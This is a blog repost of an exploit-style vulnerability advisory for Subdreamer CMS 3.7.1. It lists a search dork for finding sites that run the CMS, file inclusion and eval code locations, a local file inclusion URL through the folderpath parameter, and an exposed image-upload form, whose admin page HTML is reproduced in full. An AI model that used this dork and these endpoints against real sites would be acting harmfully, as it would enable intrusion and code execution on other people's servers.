Subdreamer CMS 3.7.1 Local File Inclusion / File Upload ~ Tebing Tinggi Lamer

| # Title    : Subdreamer CMS-v3.7.1 Mullti Vulnerability   
| # Author   : indoushka                                                               
| # email    : indoushka4ever@gmail.com                                                                                                                                                                 
| # Dork     : Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media 
| # Tested on: win8.1 Fr V.(Pro)  23:09 * 22/05/2015  
| # Download : http://www.20script.ir
=======================================

Directory listing :

http://127.0.0.1/Subdreamer/admin/tiny_mce/
http://127.0.0.1/Subdreamer/admin/login/

Remote/Local File Inclusion :

C:\web\www\Subdreamer\index.php
Line       :1097
Function   :include
Variables  :$headerfile

Php Code Execution :

C:\web\www\Subdreamer\index.php
Line       : 1616
Function   : eval
Variables  : $layout_arr,$layout_index

LFI :

http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=****


Upload File :

C:\web\www\Subdreamer\admin\tiny_mce\plugins\imagemanager\imagemanager.php
Line      : 262
Function  : move_uploaded_file
Variables : $image['tmp_name'],$imagesdir,$imagesdir


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<title>Subdreamer CMS - Admin Panel</title>
<link rel="stylesheet" type="text/css" href="http://127.0.0.1/Subdreamer/admin/styles/flipside/css/admin.css.php" />
<style type="text/css">
#content { padding: 0; margin: 0; max-width: 850px !important; min-width: 200px !important; }
.fileentry-container,
.fileentry-container-media {
  background-color: #FFF;
  border: 1px solid #c0c0c0;
  display: inline;
  float: left;
  margin: 10px;
  height: 130px;
  text-align: center;
  width: 130px;
  overflow: hidden;
}
.fileentry, .fileentry-media {
  border: none;
  display: block;
  border: none;
  padding: 4px;
  min-height: 120px;
  text-align: center;
}
.fileentry-container:hover {
  border: 1px solid #0000FF;
}
.fileentry-container-media:hover {
  border: 1px solid #00FF00;
}
</style>
<script type="text/javascript" src="../../tiny_mce_popup.js"></script>
<script type="text/javascript">
  sdurl = "http://127.0.0.1/Subdreamer/";
  function InsertImage(imagepath,img_width,img_height) {
    tinyMCE.execCommand("mceInsertContent", false, '<img src="'+imagepath+'" width="'+img_width+'" height="'+img_height+'" style="border: none" />');
    tinyMCEPopup.close();
  }
</script>
</head>
<body>
<div id="content">
    <!-- start section --><h1>Upload File</h1>
    <div class="table_wrap">
    <div class="form_wrap">
    
    <table border="0" cellpadding="0" cellspacing="0" summary="layout" width="100%">
    <tr>
      <td class="td2"><strong>Upload a new image to this folder:</strong></td>
      <td align="left" class="td3">
        <form enctype="multipart/form-data" method="post" action="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php" id="upload_form">
        <input type="hidden" name="action" value="uploadimage" />
        <input type="hidden" name="folderpath" value="****images/" />
        <input name="image" type="file" size="70" /><br />
        <input type="submit" value="Upload File" />
        </form>
        <a href="#" onclick='javascript:window.location="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=%2A%2A%2A%2Aimages%2F&action=displayimages"'>[Site Images]</a> &nbsp;
        <a href="#" onclick='javascript:window.location="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=%2A%2A%2A%2Aimages%2Farticlethumbs%2F&action=displayimages"'>[Articles Thumbs]</a> &nbsp;
        <a href="#" onclick='javascript:window.location="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=%2A%2A%2A%2Aimages%2Ffeaturedpics%2F&action=displayimages"'>[Articles Pictures]</a> &nbsp;
      </td>
    </tr>
    </table>
    </div> <!-- form_wrap -->
    </div> <!-- table_wrap -->
    
    <!-- start section --><h1>Images</h1>
    <div class="table_wrap">
    <div class="form_wrap">
    
  <table border="0" cellpadding="0" cellspacing="0" summary="images" width="100%">
  <tr>
    <td class="td1">Folder Path: http://127.0.0.1/Subdreamer/images/</td>
  </tr>
  <tr>
    <td class="td2" align="left" style="text-align: left">
    <div class="fileentry-container"><div class="fileentry"><a href="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=****images/articlethumbs/"><img alt="Change folder" border="0" width="48" height="48" src="./img/folder.gif" /></a>    <br /><a style="font-size: 10px;" href="./imagemanager.php?folderpath=****images/articlethumbs/">articlethumbs</a></div></div>
    <div class="fileentry-container"><div class="fileentry"><a href="http://127.0.0.1/Subdreamer/admin/tiny_mce/plugins/imagemanager/imagemanager.php?folderpath=****images/featuredpics/"><img alt="Change folder" border="0" width="48" height="48" src="./img/folder.gif" /></a>    <br /><a style="font-size: 10px;" href="./imagemanager.php?folderpath=****images/featuredpics/">featuredpics</a></div></div>
    <div class="fileentry-container"><div class="fileentry"><a href="javascript:void(0);" onmousedown='InsertImage("http://127.0.0.1/Subdreamer/images/default_avatar.png",80,80);' title="default_avatar.png"><img alt="default_avatar.png" border="0" src="../../../../images/default_avatar.png" width="80" height="80" /></a></div></div>
    <div class="fileentry-container"><div class="fileentry"><a href="javascript:void(0);" onmousedown='InsertImage("http://127.0.0.1/Subdreamer/images/edit.png",16,16);' title="edit.png"><img alt="edit.png" border="0" src="../../../../images/edit.png" width="16" height="16" /></a></div></div>
    <div class="fileentry-container"><div class="fileentry"><a href="javascript:void(0);" onmousedown='InsertImage("http://127.0.0.1/Subdreamer/images/mail.png",16,16);' title="mail.png"><img alt="mail.png" border="0" src="../../../../images/mail.png" width="16" height="16" /></a></div></div>
    <div class="fileentry-container"><div class="fileentry"><a href="javascript:void(0);" onmousedown='InsertImage("http://127.0.0.1/Subdreamer/images/ratings.gif",85,48);' title="ratings.gif"><img alt="ratings.gif" border="0" src="../../../../images/ratings.gif" width="85" height="48" /></a></div></div>
    </td>
  </tr>
  </table>
    </div> <!-- form_wrap -->
    </div> <!-- table_wrap -->
    </div>
</body>
</html>

Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net

 https://packetstormsecurity.com/files/132222/Subdreamer-CMS-3.7.1-Local-File-Inclusion-File-Upload.html

source :

Tebing Tinggi Lamer

Do Not Using This Article For Criminal, This Article Just For Fun And Knowledge. Thanks

Tuesday, September 15, 2015

Subdreamer CMS 3.7.1 Local File Inclusion / File Upload

0 komentar:

Post a Comment